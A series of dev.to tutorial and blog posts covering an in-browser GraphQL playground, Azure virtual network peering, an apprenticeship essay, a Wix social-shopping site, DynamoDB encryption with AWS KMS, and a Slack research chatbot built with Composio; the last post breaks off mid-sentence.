--- title: GraphQL Server in the Browser using WebAssembly published: true date: 2024-06-18 00:00:00 UTC tags: WebAssembly,GraphQL,Playground,Rust canonical_url: https://exograph.dev/blog/playground --- On the heels of our [last feature release](https://exograph.dev/blog/cloudflare-workers), we are excited to announce a new feature: Exograph Playground in the browser! Thanks to the magic of WebAssembly, you can now run Exograph servers entirely in your browser, so you can try Exograph without even installing it. That's right, we run a [Tree Sitter](https://tree-sitter.github.io/tree-sitter) parser, typechecker, GraphQL runtime, _and_ Postgres **all in your browser**. ## See it in action[​](https://exograph.dev/blog/playground#see-it-in-action "Direct link to See it in action") Head over to the [Exograph Playground](https://exograph.dev/playground) to try it out. It shows a few pre-made models and populates data for you to explore. It also shows sample queries to help you get started. <!-- --> A few models need authentication, so you can click on the "Key" icon in the middle center of the GraphiQL component to simulate the login action. When you open the playground, the top-left portion shows the model. The top-right portion shows tabs to give insight into Exograph's inner workings. The bottom portion shows the GraphiQL interface to run queries and mutations. <!-- --> [![](https://exograph.dev/assets/images/screenshot-492818f0ce1f649e4bdc1aa0a402f823.png)<button style="width:220px;height:66px;position:absolute;top:calc(50% - 33px);left:calc(50% - 110px"><span>Open Playground</span></button>](https://exograph.dev/playground) You can also create your model by replacing the existing model in the playground. The playground supports sharing your playground project as a gist. ## How it works[​](https://exograph.dev/blog/playground#how-it-works "Direct link to How it works") The Exograph Playground runs entirely in the browser. Besides the initial loading of static assets (like the WebAssembly binary and JavaScript code), you don't need to be connected to the internet. This is possible because we compiled Exograph, written in Rust, to WebAssembly. ![Playground Architecture](https://exograph.dev/assets/images/how-it-works-9967b1881fb7d1b8d16f371f22efdead.png) ### Builder[​](https://exograph.dev/blog/playground#builder "Direct link to Builder") The builder plays a role equivalent to the [`exo build`](https://exograph.dev/docs/cli-reference/development/build) command. It reads the source code, parses and typechecks it, and produces an intermediate representation (equivalent to the `exo_ir` file). The builder also includes elements equivalent to the [`exo schema`](https://exograph.dev/docs/cli-reference/development/schema) command to compute the SQL schema and migrations. On every change to the source code, the builder validates the model, reports any errors, and produces an updated intermediate representation. You can see the errors in the "Problems" tab. The builder also produces the initial SQL schema and migrations for the model as you change it. The playground will automatically apply migrations as needed. You can see the schema in the "Schema" tab. ### Runtime[​](https://exograph.dev/blog/playground#runtime "Direct link to Runtime") The runtime is equivalent to the [`exo-server`](https://exograph.dev/docs/cli-reference/production) command. It processes the intermediate representation the builder produced and serves the GraphQL API. When you run a query, it sends it to the runtime, which computes the SQL query, runs against the database, and returns the results. The runtime also sends logs to the playground, which you can see in the "Traces" tab. This aids in understanding what Exograph is doing under the hood, including the SQL queries it executes. ### Postgres[​](https://exograph.dev/blog/playground#postgres "Direct link to Postgres") The playground uses [pglite](https://github.com/electric-sql/pglite), which is Postgres compiled to WebAssembly. Currently, we store Postgres data in memory, so you will lose the data when you refresh the page. We plan to add support for saving the data to local storage. ### GraphiQL[​](https://exograph.dev/blog/playground#graphiql "Direct link to GraphiQL") The GraphiQL is a standard GraphQL query interface. You can run queries and mutations against the Exograph server. The playground populates the initial query for you to get started. ## Sharing Playground Project as a Gist[​](https://exograph.dev/blog/playground#sharing-playground-project-as-a-gist "Direct link to Sharing Playground Project as a Gist") The playground supports sharing the content as a gist. You can load such a gist using the `gist` query parameter. For example, to load the gist with ID `abcd`, you can use the URL `https://exograph.dev/playground?gist=abcd`. You can create a gist to share your model, the seed data, and the initial query populated in GraphiQL. The files in gist follow the same layout as the project directory in Exograph, except you use `::` as the directory separator. - `src::index.exo`: The model - `tests::init.gql`: The seed data. See [Initializing seed data](https://exograph.dev/docs/production/testing#initializing-seed-data) for more details. - `playground::query.graphql`: The initial query in GraphiQL - `README.md`: The README to show in the playground We will keep improving the sharing experience in the future. ## What's next[​](https://exograph.dev/blog/playground#whats-next "Direct link to What's next") This is just the beginning to make Exograph easier to explore. Here are a few planned features to make the playground even better (your feedback is welcome!): - **Support JavaScript Modules** : In non-browser environments, Exograph supports [Deno Modules](https://exograph.dev/docs/deno). Deno cannot be compiled to WebAssembly, so we cannot run it in the browser. However, browsers already have a JavaScript runtime 🙂, which we will support in the playground. - **Persistent Data** : We plan to add support for saving the data to local storage so you can continue working on your data model across sessions. - **Improved Sharing** : We will add a simple way to create gists for your playground content and share it with others. Try it out and let us know what you think. If you develop a cool model, publish it as a [gist](https://gist.github.com/) and share it with us on [Twitter](https://twitter.com/exographdev) or [Discord](https://discord.gg/EPdqyvCpNw). We would appreciate a [star on GitHub](https://github.com/exograph/exograph)!
ramnivas
1,920,259
Isolate and Connect Your Applications with Azure Virtual Networks and Subnets (Part 1)
Introduction: Imagine you have a critical application that requires isolation from the public...
0
2024-07-17T21:56:58
https://dev.to/jimiog/isolate-and-connect-your-applications-with-azure-virtual-networks-and-subnets-part-1-3k70
azure, cloud, network, security
**Introduction:** Imagine you have a critical application that requires isolation from the public internet and secure communication with other internal resources. Azure virtual networks and subnets provide the perfect solution to achieve this. We'll guide you through creating virtual networks with peered subnets, enabling private and secure communication between your applications. **Creating the Virtual Networks:** 1. **Search and Create:** Start by searching for "Virtual Networks" in the Azure portal search bar. Click "Create" to initiate the virtual network creation process. ![Clicking Create on Virtual Networks](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a5bexwy1wu6opxprbp4w.jpg) 2. **Resource Group and Naming:** Create a resource group in the East US region to organize your resources. Provide a descriptive name for your virtual network, such as "app-vnet". (The image uses Canada Central, but select East US). ![Configure the details for the network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6kof0vvs14qy5lrnox7m.jpg) 3. **Address Space:** Under the "IP Addresses" tab, define the IPv4 address space for your virtual network. A common private address range is 10.1.0.0/16, which provides a good amount of usable IP addresses. ![Changing the default subnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kmv9vn8x51xhizul52zq.jpg) 4. **Subnet Configuration:** Click the "Edit" icon for the default subnet. Assign a meaningful name like "frontendSubnet" and configure the address range. Use a subnet mask of /24 (255.255.255.0) to create a subnet with 254 usable IP addresses. For example, you can use the starting IP address 10.1.0.0 for the frontend subnet. This allocates IP addresses from 10.1.0.0 to 10.1.0.255 for your frontend resources. ![Editing the subnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iys0cdoljk55bn807scv.jpg) 5. **Creating the Backend Subnet:** Click "Add a subnet" and configure another subnet named "backendSubnet". Assign a non-overlapping address range within the virtual network's space. For instance, you can use 10.1.1.0/24. ![Both subnets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vq4pdiew9znz35zc8nyh.jpg) 6. **Review and Create:** Once you've defined both subnets, click "Review + create" to validate and deploy the virtual network. **Creating the Second Virtual Network:** Follow steps 1-6 above to create a second virtual network for additional resources or functionalities. Here's an example configuration: * Resource Group: Use the same resource group * Name: Descriptive name, such as "hub-vnet" (for a hub virtual network) * Address Space: Choose a non-overlapping address space from the available private ranges. For example, you can use 10.0.0.0/16. * Subnet Configuration: Define subnets specific to the resources you plan to deploy in this virtual network. ![Creating the second virtual network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ilttq3zciedvahefpc0g.jpg) **Peering the Virtual Networks:** 1. **Navigate and Select:** Go to the first virtual network you created and navigate to the "Peerings" section. Click on "Add" to initiate the peering configuration. ![Finding Peerings on the first vnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8mpmmpo3wo0o67dm1bld.jpg) 2. **Peering Details:** Provide a descriptive name for the peering connection, such as "app-vnet-to-hub-vnet" (assuming the second network is for a hub). 3. **Virtual Network Selection:** Choose the virtual network you want to peer with from the "Virtual network" dropdown menu. In this case, select the second virtual network you just created. 4. **Remote Peering:** Define a name for the remote peering connection from the target virtual network's perspective. For example, "hub-vnet-to-app-vnet". 5. **Verification:** Once configured, click "Save" to establish the peering connection. You can then verify the successful peering status in the Azure portal. ![Configuring the peering connection](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/58yfylxskfebes2gdri4.jpg) ![Confirming the peering connection](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3tdmpfo4jzqf9fbjbsp7.jpg) **Conclusion** By following these steps, you'll have created isolated virtual networks with subnets for your applications. The peered connection allows secure communication between your frontend and backend resources.
jimiog
1,920,267
Package Received
When starting a new job, I tend to enter it cautiously optimistic. I don't consider it a reality...
0
2024-07-12T19:40:13
https://dev.to/neffcodes/package-received-1815
webdev, careerdevelopment
When starting a new job, I tend to enter it cautiously optimistic. I don't consider it a reality until I can touch it, literally. Whenever I start a new job, it doesn't hit until I first enter the building or get to my workstation. The same thing happened when I joined the Develop Carolina apprenticeship program as a software developer. I couldn't bring myself to celebrate the new opportunity until I had something tangible in hand. In this case, it was a cardboard box. It's weird how a box can contain so many things. Not only does it provide the equipment needed to do my new job, but it also brings excitement and the realization that "this is happening." It can also contain less inviting things, like imposter syndrome or an excess amount of packaging material. Those doubts stem from my past experiences. When I first pivoted my career into software development, I was thrown into the deep end. I only worked on small personal projects by that point and never worked on any large-scale application development. I was lucky to have an amazing team lead, who was patient and understanding, but I was riddled with imposter syndrome. I had the same generic title of Fullstack Developer as the seniors on the team, and I felt that I needed to be at the same skill level as them. In hindsight, that was ridiculous since I was new to the field, but I didn't know any better. But luckily, that is the beauty of now being an apprentice. I have a new opportunity to define myself, and I know it is expected of me, as Miss Frizzle says, to "Take chances, make mistakes, and get messy." And I fully intend to do that. By the end of my apprenticeship, I hope to further develop my technical skills to be more on par with my peers, expand my support network, have more self-confidence, and ultimately have fun. I look forward to being able to work and grow with my fellow apprentices every morning. It has only been the first week, and I have already learned a lot, both professionally and personally. So look out world, this cardboard Pandora's box is open, and I can't wait to see what is inside (once I get through all this packaging).
neffcodes
1,920,313
Sharekart
This is a submission for the Wix Studio Challenge . The challenge was to create an innovative...
0
2024-07-12T22:40:17
https://dev.to/salman2301/sharekart-4i48
devchallenge, wixstudiochallenge, webdev, javascript
*This is a submission for the [Wix Studio Challenge ](https://dev.to/challenges/wix).* > The challenge was to create an innovative e-commerce site using Wix Studio and existing Wix API. ## What I Built **TL;DR:** The best type of marketing is "Word-of-mouth." I built a site where buyers can post their purchases, allowing others to add all items to their cart and checkout with just one click. Basically, it combines E-commerce with Social Media. --- Once a user makes a purchase, they can post it in a newsfeed with all the line items. Other users can then add these products to their cart and easily check out. This enhances product visibility. Users can follow others, and on the product page, they can see a list of users they follow who have also purchased the same product. This reassures users about the product's quality, especially if a big influencer has it, as their followers may also want it. I've also added a comment section under each post so others can interact directly with the buyer and ask questions. List of all **core-system** developed using Wix Database, Backend code, and Wix Studio. ### System - **Social Media system** - Post / Comment / Follow - Once a user makes a purchase, they can post their entire cart and write a comment, which will appear in the newsfeed. - Ranking system based on posts, products, inventory, and user activity will rank higher or lower (Please check below for more info). - Notifications are sent using the realtime feature to all other users on the Newsfeed page. - Users can like / comment / follow on posts. - Users can like / follow the commenter. - Used Wix Studio's scrollable container to design for optimal UX on both desktop and mobile. - Users can add the entire cart from a post instantly and continue to checkout as usual. - **Rating and review system** - Users can rate and review any product. - A helpful button allows users to upvote reviews, improving review visibility based on the number of people who find them helpful. - **Wishlist system** - Created a custom label Wishlist and added one or many products to a Wishlist created on the product page. - Shows the current user's Wishlist on a dynamic page for easy add-to-cart function later. - **Follow system** - Follower Also Bought UI - Shows a profile icon on the product page of all users following who bought that product. - **Log system** - A global logging system that stores logs in the database and clears them every month to aid in debugging. - **Account page** - Extended built-in account information for user's to upload their photo. ## Demo [https://sharekart.salman2301.com](https://sharekart.salman2301.com) ### Newsfeed section ![Default home page](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9ur8dfm1df3jxtxr0vks.png) ### Newsfeed - Mobile view ![Mobile view](https://media.giphy.com/media/v1.Y2lkPTc5MGI3NjExbW0xazBlN3ZhbjY3MWl2ZzhkYWh5bnJsbW1sMHZ1a2JpM2F1b3hneiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/DU7fhCa9SppTMW8aS8/giphy.gif) ### Rating and review - Product page ![Rating and review](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/syfwm9z09jwcz458io4r.png) ### Wishlist page ![Wishlist button](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i1clx3xjtthdz5h8voiw.png) ![Wishlist section](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4yldl4v7nppqpuniy9dq.png) ### User also bought (People you follow) ![Following user bought](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xjlj2g38e86k3t05gp31.png) ## Development Journey I used Wix components like Repeater, Table, Grid Layout, Stack, and Store APIs to build the complex system with just ~1000 lines of Wix Velo code, including JSDoc types. Modules used: `date-fns` npm package and a `utils` module file with necessary snippets for frontend and backend. To improve performance, I used Database Indexing, Wix Data aggregates, and Wix Data hooks to manage database interactions efficiently. ### Key Wix Studio Features Used - Complex grid layouts and scrollable elements for optimal UX on desktop and mobile. - JsDOC type system for better development experience. - Realtime API for notifications on new posts. - Dynamic pages for efficient content creation based on database entries. - Database indexing and normalization strategies for improved performance and developer experience. - Secure data transmission using `.web.js`, database permissions, and realtime permissions based on user roles. - WixStorev2 API to enhance functionality like Thank You page and `addToCart`. - WixMember API for user authentication and extending profile fields. - Intl library for text formatting based on global localization. - Custom logger with cron job for efficient database maintenance. - CSS width calculation for responsive design. - WixData Aggregate for calculating average ratings, follower counts, and other data for ranking system. - Backend events to monitor inventory changes and update product rankings. - Bulk saving with Wix to update multiple products' scores at once. `bulkSave` - Global.css to add custom animation css for all lightbox - Wix http-function, to get the number of followers, can be used to add as a badge [sample](https://sharekart.salman2301.com/_functions/followers?userId=59dc88d5-c871-4d52-80c1-1e432316b7b4) And [lot more](https://github.com/Salman2301/sharekart/blob/main/src/pages/Home.c1dmp.js) ### Ranking Algorithm Below is the weight-based ranking algorithm used for posts: ```javascript const WEIGHT = { // Section #1 POST_LIKE: 30, POST_COMMENT_COUNT: 20, USER_FOLLOWER: 5, // User weight; in the future, adjust based on percentile for proper distribution. // Section #2 POST_ADD_TO_CART: 50, // Section #3 POST_CREATED: 500, // Section #4 PER_PRODUCT: 5, // More products are better. // Section #5 // For each product in the post PRODUCT_REBOUGHT: 20, PRODUCT_RATING_POSITIVE: 15, // Rating from 3-5. PRODUCT_RATING_NEGATIVE: -20, // Rating below 3. PRODUCT_REVIEW_COUNT: 0, // Impact to be calculated. PRODUCT_WISHLIST: 5, INVENTORY_INSTOCK: 50, INVENTORY_LABEL_ON_SALE: 50 } ``` #### section #1 - Likes, number of comments, and number of followers increase the rank based on the above weights per unit. > Currently, follower numbers are multiplied directly by weights, but in the future, consider calculating based on percentiles to account for users with a large number of followers. #### section #2 - Add to cart weight: based on the number of times other users click on a post to add all items to their cart. This indicates user interest in the post, tracked through events to adjust ranking. #### section #3 - Post created weight: uses a mathematical formula to calculate post ranking based on recency. Newer posts receive a higher score, decreasing exponentially with time. For example, a post created just now might score 500, while one created an hour ago scores 491.74, reducing by about 9 points. ```javascript function getLatestScore(date) { const currentTime = new Date(); const inputDate = new Date(date); const initialScore = 500; const decayRate = 0.4 / (24 * 60 * 60); // Adjust decay rate for seconds. const secondsDifference = differenceInSeconds(currentTime, inputDate); const score = initialScore * Math.exp(-decayRate * secondsDifference); return round(score); } ``` #### section #4 - Per product weight: adjusts based on the number of line items in the cart. More items increase ranking. #### section #5 - Product and inventory weight: complex algorithm incorporating ratings, wishlist additions, and inventory status (in stock, on sale). Ratings below 3 negatively impact product rank, while 3-5 ratings positively influence it. Notably, I separated product and post rankings, stored in separate databases to avoid Wix rate limits. {% cta https://github.com/Salman2301/sharekart/blob/main/src/backend/ranks.js %} Open in GitHub {% endcta %} {% collapsible Database structure %} 1. **global_post_rank** - Title (string) - user_post (ref) - Score (number) - Scoreinfo (object) 2. **log** - Mainmessage (string) - Trace (string) - Message (string[]) - Place (string) - Type (string) 3. **product_rank** - Title (string) - Score (number) - Scoreinfo (object) 4. **user_follow** - Title (string) - follower (string - user_id) - followee (string - user_id) 5. **user_info** - Title (string) - displayName (string) - Image (string) - followerCount (number) 6. **user_post** - post (string) - fullname (string) - orderId (string) - Lineitems (array) - Total (number) - Raw (object) - Currency (string) - Totalprice (number) 7. **user_post_comment** - Title (string) - comment (string) - post (string) - likeCount (number) 8. **user_post_comment_like** - Title (string) - comment_like (number) 9. **user_post_event** - Title (string) - type (string) - Postid (string) 10. **user_post_like** - Title (string) - user_post (ref - user_post) 11. **user_review** - Title (string) - rating (number) - review (string) - tag (string[]) - helpful (number) - name (string) - productId (string) 12. **user_review_helpful** - Title (string) - review (string) 13. **user_wishlist** - Title (string) 14. **user_wishlist_product** - Title (string) - wishlist (ref - user_wishlist) - product_id (ref stores/Product) - Owner (string - user_id) {% endcollapsible %} {% collapsible Future development ideas %} Given more time, I would build essential features like: - **Personalized Social Media Algorithms:** Implement algorithms that personalize the newsfeed based on each user's purchase history and product preferences. This would enhance user engagement by showing relevant content tailored to their interests and locality. - **Loyalty Program:** Introduce a built-in loyalty program where users whose posts receive significant likes can be rewarded with discounts. This approach incentivizes users to generate more engagement and sales, similar to an affiliate program. These features would not only enhance user experience but also drive more active participation and sales through the platform. {% endcollapsible %} ## About Me I'm a freelance developer, part-time and building a Saas live streaming app during free-time. Checkout my [Github](https://github.com/salman2301) Profile and my Site https://salman2301.com If you're interested in this app or want to collaborate on similar projects, reach out via: - Email: [admin@salman2301.com](mailto:admin@salman2301.com) - GitHub: [salman2301](https://github.com/salman2301) - Twitter: [salman2301](https://twitter.com/salman2301) - LinkedIn: [asalman2301](https://linkedin.com/in/asalman2301) Thanks to Wix for this opportunity and for positively impacting the tech industry! > Feel free to explore the demo at [https://sharekart.salman2301.com](https://sharekart.salman2301.com). Add a product to your cart and use the promo code **ALL** to experience the functionality.
salman2301
1,920,340
Securing Data at Rest: The Importance of Encryption and How to Implement It
Introduction Keeping your data safe is essential for any organization to prevent...
0
2024-07-14T17:30:56
https://dev.to/iamsherif/securing-data-at-rest-the-importance-of-encryption-and-how-to-implement-it-81a
security, serverless, data, dynamodb
## Introduction Keeping your data safe is essential for any organization to prevent unauthorized access and breaches. In AWS's shared security responsibility model, customers are responsible for anything they put in the cloud or connect to the cloud, while AWS is responsible for the security of the cloud. For more details, you can [_read more information about AWS shared responsibility model._](https://aws.amazon.com/compliance/shared-responsibility-model/) Data at rest refers to data stored in AWS data stores, such as Amazon S3 buckets and DynamoDB. In this article, I will highlight the importance of encrypting data at rest and provide a guide on how to encrypt an [_Amazon DynamoDB_](https://aws.amazon.com/dynamodb/) table using a Customer Managed key (CMK). ## Why do we need to encrypt data at rest? AWS data stores offer encryption at rest using configurable options that we control. These encryption options leverage the AWS Key Management Service (AWS KMS) and keys that either we or AWS manage. By default, data on Amazon DynamoDB tables is fully encrypted. AWS offers several encryption tools, including [_AWS Cryptographic Services and Tools_](https://docs.aws.amazon.com/crypto/latest/userguide/awscryp-service-toplevel.html), and [AWS KMS](https://aws.amazon.com/kms/). In this article, we will focus on adding encryption to DynamoDB using a [AWS KMS CMK](https://docs.aws.amazon.com/kms/latest/developerguide/concepts.html#key-mgmt). The importance of encrypting data at rest includes: - Ensuring sensitive data stored on disks is not readable by any user or application without a valid key. - Maintaining the confidentiality and protection of sensitive information from unauthorized access. - Enhancing customer trust by demonstrating a commitment to data security and privacy. - Minimizing the impact of data breaches on business operations and reputation. ## How to Encrypt a DynamoDB Table Using AWS KMS CMK The steps below guides on how to encrypt a DynamoDB table using AWS KMS CMK from AWS Management Console: ### Step 1: Create an AWS KMS Customer Managed Key 1. Log in to your **AWS Management Console**. 2. **Navigate to AWS Key Management Service (KMS)** and click on **Create key**. ![Create key image on management console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eu5ix93fzf3ndnw5wqfq.png) 3. **Configure Key**. ![Configure key image on management console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ewe13a98nrgihb4w3zts.png) 4. **Configure Add Labels**: Name the key "mykey". ![Configure Add Labels](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/skozjw97ltzogv74ye1s.png) 5. **Define Key Administrative Permissions and Usage Permissions**. [_Read more_](https://repost.aws/questions/QU4A3jhSKwRy-3vUUrS2Fqzw/assign-role-for-administrative-and-usage-permission-kms) about assigning roles for administrative and usage permissions. 6. **Review your configurations** and click **Finish**. ### Step 2: Encrypt DynamoDB Table Data Using the Key 1. **Go to the DynamoDB console** and select **Tables**. 2. Click on **Create table**. ![Click on Create table](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8oa6ouvwz5sv7tjicugx.png) 3. On the next page, name your table "`myTable`" and add a partition key. 4. In **Table Settings**, click on **Customize settings**. ![Customize settings](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s2qmm602dw5zojg4iutz.png) 5. Scroll down to **Encryption at rest** and add your custom key. ![Add our own custom key](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z2dhq180kvd37k0k1zuc.png) Choose the key you created named "mykey". 6. Click **Create table**. ![Create table](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jfoukzvclyptnqjbcc15.png) Your table will now be encrypted using the selected CMK. ## Conclusion Encrypting data at rest in AWS is a critical step in ensuring the security and integrity of your organization's sensitive information. By leveraging AWS KMS Customer Managed Keys (CMK), you can maintain control over your encryption keys and meet compliance requirements. This guide has walked you through the process of creating a custom key and using it to encrypt a DynamoDB table. Implementing these encryption practices not only protects your data from unauthorized access but also enhances customer trust and minimizes the impact of potential data breaches. Prioritizing data security is essential for safeguarding your business operations and reputation. Follow my social handles for more on AWS Serverless services: Click to follow on - [_LinkedIn_](https://www.linkedin.com/in/sherifawofiranye) - [_Twitter_](https://www.x.com/awofiranyesher2) - [_Dev_](https://dev.to/iamsherif) - [_Medium_](https://medium.com/@awofiranyesherif4)
iamsherif
1,920,415
How to build a Perplexity-like Chatbot in Slack?
TL;DR I spend a lot of time on Slack and often need deep-researched information. For this,...
0
2024-07-16T17:17:09
https://dev.to/composiodev/how-to-build-a-perplexity-like-chatbot-in-slack-533j
webdev, python, programming, ai
## TL;DR I spend a lot of time on Slack and often need deep-researched information. For this, I have to go to Google search and research topics manually, which seems unproductive in the age of AI. So, I built a Slack chatbot to access the internet and find relevant information with citations, similar to Perplexity. Here’s how I built it; - Configure a SlackBot in the workspace. - The bot forwards all the messages in the workspace to an event listener. - Parse the information from the message events and pass it to an AI agent. - The AI agent, equipped with tools like Exa and Tavily, searches the Internet for the topic and returns the response. - The agent’s response is then posted as a comment in the main message thread. Try the Agent live now on Composio Playground👇. {% cta https://playground.composio.dev/agent/slack_assistant %} Try it now in the Playground🚀{% endcta %} ## What are AI agents? Before going ahead, let’s understand what is an AI agent. AI agents are systems powered by AI models that can autonomously perform tasks, interact with their environment, and make decisions based on their programming and the data they process. ![Slack Ritual](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/07mxd8vodn49iwmzx1wi.gif) --- ## Your AI agent tooling platform 🛠️ Composio is an open-source platform that offers over 150 production-ready tools and integrations such as GitHub, Slack, Code Interpreter, and more to empower AI agents to accomplish complex real-world workflows. ![gif](https://res.cloudinary.com/practicaldev/image/fetch/s--lP0Jf3NK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bm9mrmovmn26izyik95z.gif") Please help us with a star. 🥹 It would help us to create more articles like this 💖 {% cta https://github.com/ComposioHQ/composio %}Star the Composio.dev repository ⭐{% endcta %} --- ## Let’s get started 🔥 Start with creating a virtual environment. ```python python -m venv slack-agent cd slack-agent source bin/activate ``` Now, install the libraries. ```python pip install composio-core composio-llamaindex pip install llama-index-llms-openai python-dotenv ``` A brief description of libraries - The `composio-core` is the main library for accessing and configuring tools and integrations. It also has a CLI API to manage integrations and triggers conveniently. - The `composio-llamaindex` is the [LlamaIndex](https://www.llamaindex.ai/) plug-in for Composio. It lets you use all the LlamaIndex functionalities with Composio tools. - The `llama-index-llms-openai` is an additional library from LlamaIndex that enables you to use OpenAI models within its framework. - `python-dotenv` loads environment variables from a `.env` file into your Python project's environment, making it easier to manage configuration settings. Next, Create a `.env` file and add environment variables for the OpenAI API key. ```bash OPENAI_API_KEY=your API key ``` ## **Configure the Integrations *🔧*** Composio allows you to configure SlackBot without writing any code for the integration. Composio handles all the user authentication and authorization flows, so you can focus on shipping faster. You can do it from the terminal using Composio’s dedicated CLI API. But before that, log in to Composio from the CLI and update apps by running the following commands. ```bash composio login composio apps update ``` Complete the login flow to use Composio CLI API. Execute the following command to configure a Slackbot and a GitHub user account. ```bash composio add slackbot ``` Now, finish the authentication flow to add a Slackbot integration. Once you finish the integration flow, your live integration will appear in the [**Integrations**](https://app.composio.dev/your_apps) section. ![Composio Integrations](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5zxg5rdgfxqdu9qw0tut.png) Once the SlackBot is integrated, go to the apps section in your workspace, get the BOT ID, and add it to the `.env` file. ![Slack BOT ID](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5s8kk6nhb3l15rvxahf2.jpg) ## Set up SlackBot Trigger ⚙️ Triggers are predefined conditions that activate your agents when met. Composio offers a built-in event-listener to capture these trigger events. Here, we set up a SlackBot trigger to fetch the event data when a new message is added to the workspace and another trigger when a new message is added to the thread. ``` composio triggers enable slack-receive-message composio triggers enable slackbot_receive_thread_reply ``` Go to the trigger section and add the triggers you need. Also, you can add triggers from the dashboard from the [SlackBot page](https://app.composio.dev/app/slackbot). Go to the trigger section and add the triggers you need. ![integrations page](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fstgytn67dmz5ym6sq7q7.png) ## Building the Agentic Workflow 🏗️ Now that we have set up integrations and triggers let's move on to the coding part. ![monkey codes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cjlyh0y9dlc11i0tfek8.gif) ### Step 1: Import packages and define tools Create a `main.py` file and paste the following codes. ```python import os from dotenv import load_dotenv from composio_llamaindex import Action, App, ComposioToolSet from composio.client.collections import TriggerEventData from llama_index.core.agent import FunctionCallingAgentWorker from llama_index.core.llms import ChatMessage from llama_index.llms.openai import OpenAI load_dotenv() llm = OpenAI(model="gpt-4o") # Bot configuration constants BOT_USER_ID = os.environ["SLACK_BOT_ID"] # Bot ID for Composio. Replace with your bot member ID, once the bot joins the channel. RESPOND_ONLY_IF_TAGGED = ( True # Set to True to have the bot respond only when tagged in a message ) # Initialize the Composio toolset for integration with the OpenAI Assistant Framework composio_toolset = ComposioToolSet() composio_tools = composio_toolset.get_tools( apps=[App.CODEINTERPRETER, App.EXA, App.FIRECRAWL, App.TAVILY] ) ``` Here’s what is going on in the above code block, - We imported the packages and modules needed for the project. - Set up `.env` variables to the environment variable with `load_dotenv()`. - Set up global variables BOT_USER_ID and RESPOND_ONLY_IF_TAGGED. - Initialize the Composio toolset. - Add Code Interpreter, Exa, Fire Crawl, and Tavily services as tools. ### Step 2: Define Agents Now define the Slack agent with tools and llm. ```python # Define the Crew AI agent with a specific role, goal, and backstory prefix_messages = [ ChatMessage( role="system", content=( "You are now an integration agent, and whatever you are requested, you will try to execute utilizing your tools." ), ) ] agent = FunctionCallingAgentWorker( tools=composio_tools, llm=llm, prefix_messages=prefix_messages, max_function_calls=10, allow_parallel_tool_calls=False, verbose=True, ).as_agent() ``` - We defined the agent using `FunctionCallingAgentWorker` with a prefix message as the system prompt. - This provides the LLM with additional context regarding the roles and expectations. - The agent has been provided with the defined tools. - The `max_function_calls` parameter sets the number of times the agent will retry if any error is encountered. - verbosity is set to True to log complete agent workflow. Note: The `FunctionCallingAgentWorker` only supports LLMs with function-calling abilities like GPT, Mistral, and Anthropic models. ### Step 3: Defining the Event Listener The next step is to set up the event listener. This will receive the payloads from the trigger events in Slack. The payloads contain the required event information, such as channel ID, message text, timestamps, etc. You retrieve the needed information, process it, and perform actions. ```python # Create a listener to handle Slack events and triggers for Composio listener = composio_toolset.create_trigger_listener() # Callback function for handling new messages in a Slack channel @listener.callback(filters={"trigger_name": "slackbot_receive_message"}) def callback_new_message(event: TriggerEventData) -> None: payload = event.payload user_id = payload.get("event", {}).get("user", "") # Ignore messages from the bot itself to prevent self-responses if user_id == BOT_USER_ID: return message = payload.get("event", {}).get("text", "") # Respond only if the bot is tagged in the message if configured to do so if RESPOND_ONLY_IF_TAGGED and f"<@{BOT_USER_ID}>" not in message: print("Bot not tagged, ignoring message") return # Extract channel and timestamp information from the event payload channel_id = payload.get("event", {}).get("channel", "") ts = payload.get("event", {}).get("ts", "") thread_ts = payload.get("event", {}).get("thread_ts", ts) # Process the message and post the response in the same channel or thread result = agent.chat(message) print(result) composio_toolset.execute_action( action=Action.SLACKBOT_CHAT_POST_MESSAGE, params={ "channel": channel_id, "text": result.response, "thread_ts": thread_ts, }, ) listener.listen() ``` - The callback function `callback_new_message` is invoked when the trigger event in Slack matches `slackbot_receive_message`. - The user ID is extracted from the event payload. If it matches the bot ID, the process is skipped. - If not, the code checks if the message has the bot ID mentioned. - We extract the message, channel ID, and timestamps. - The message is passed to the Slack agent you defined earlier. - The response from the agent is then sent to Slack. Now, once everything is set up, run the Python file. Make sure you have set up the Slack bot correctly in your channel. Here is how you can add the Slack Bot to your channel 👇. ![add slackbot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/86n4vc24n2v4av04nfak.gif) When you send a message in Slack tagging the bot, the event listener receives the payload, the agent acts on it, and the response is sent back to the 